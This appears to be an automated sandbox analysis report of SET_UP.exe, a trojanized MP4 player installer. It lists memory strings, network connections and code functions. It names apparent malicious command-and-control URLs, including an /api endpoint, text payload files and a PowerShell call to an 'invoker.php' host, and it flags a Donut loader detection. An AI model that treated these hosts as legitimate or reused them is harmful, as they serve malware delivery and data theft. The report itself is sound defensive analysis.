            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtk9
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/u
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SET_UP.exe, 00000000.00000003.1909274602.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.clGS
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909305895.0000000000822000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909274602.000000000081F000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/
            Source: SET_UP.exe, 00000000.00000003.1929874990.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/&&.
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/8
            Source: SET_UP.exe, 00000000.00000003.1909274602.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/QQ
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/api
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/api#
            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/api1
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/apig
            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/buL
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/bub
            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/pi
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/pi1
            Source: SET_UP.exe, 00000000.00000002.2021753399.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click:443/api
            Source: SET_UP.exeString found in binary or memory: https://dfgh.online/invo
            Source: powershell.exe, 00000004.00000002.1956147215.0000000005112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
            Source: powershell.exe, 00000004.00000002.1956147215.0000000005112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=hZ
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SET_UP.exe, 00000000.00000003.1968564993.0000000003A18000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965099584.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1966990463.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1969681725.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1968481399.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1971285796.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964736489.0000000003AEA000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977051010.0000000003A1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1967202416.0000000003BFF000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1972519369.0000000003C67000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1967833052.0000000003B1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965800504.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1963898121.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973060526.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1966880719.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965024411.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1968373832.0000000003A1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964648647.0000000003A17000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1970689425.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964384270.0000000003A14000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2019740699.0000000003A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/L
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/Y
            Source: SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtFmsZr
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1$m
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
            Source: SET_UP.exe, 00000000.00000003.1861986622.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: SET_UP.exe, 00000000.00000003.1861986622.000000000376C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1862063794.0000000003765000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1873500798.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: SET_UP.exe, 00000000.00000003.1862063794.0000000003740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: SET_UP.exe, 00000000.00000003.1861986622.000000000376C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1862063794.0000000003765000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1873500798.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: SET_UP.exe, 00000000.00000003.1862063794.0000000003740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com/mp4-player
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/download.html
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com/mp4-player/purchase.html
            Source: SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP4
            Source: SET_UP.exeString found in binary or memory: https://www.tomabo.com/mp4-player/update.xml
            Source: SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGo
            Source: SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/mp4-playerA
            Source: SET_UP.exe, 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tomabo.com/videos/dog-and-balls.mp4
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004080EC GetParent,GetKeyState,GetKeyState,GetKeyState,PostMessageW, | 0_2_004080EC
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004B486B GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, | 0_2_004B486B
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004B09F5 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,SendMessageW,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent, | 0_2_004B09F5
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004BCB4B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,0_2_004BCB4B

            System Summary

            Source: 00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe | Window found: window name: AutoHotkey
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0041D56A GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 0_2_0041D56A
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004A5F61 0_2_004A5F61
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004841F1 0_2_004841F1
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0047C1B0 0_2_0047C1B0
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004A828C 0_2_004A828C
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00420416 0_2_00420416
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00458670 0_2_00458670
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004407C0 0_2_004407C0
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0046C850 0_2_0046C850
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004689D0 0_2_004689D0
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00448B20 0_2_00448B20
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00404DA7 0_2_00404DA7
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0046CF40 0_2_0046CF40
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00488F00 0_2_00488F00
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0047D180 0_2_0047D180
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00485230 0_2_00485230
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00489480 0_2_00489480
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0043D4B0 0_2_0043D4B0
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00441680 0_2_00441680
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004197D1 0_2_004197D1
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004857F0 0_2_004857F0
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0046D820 0_2_0046D820
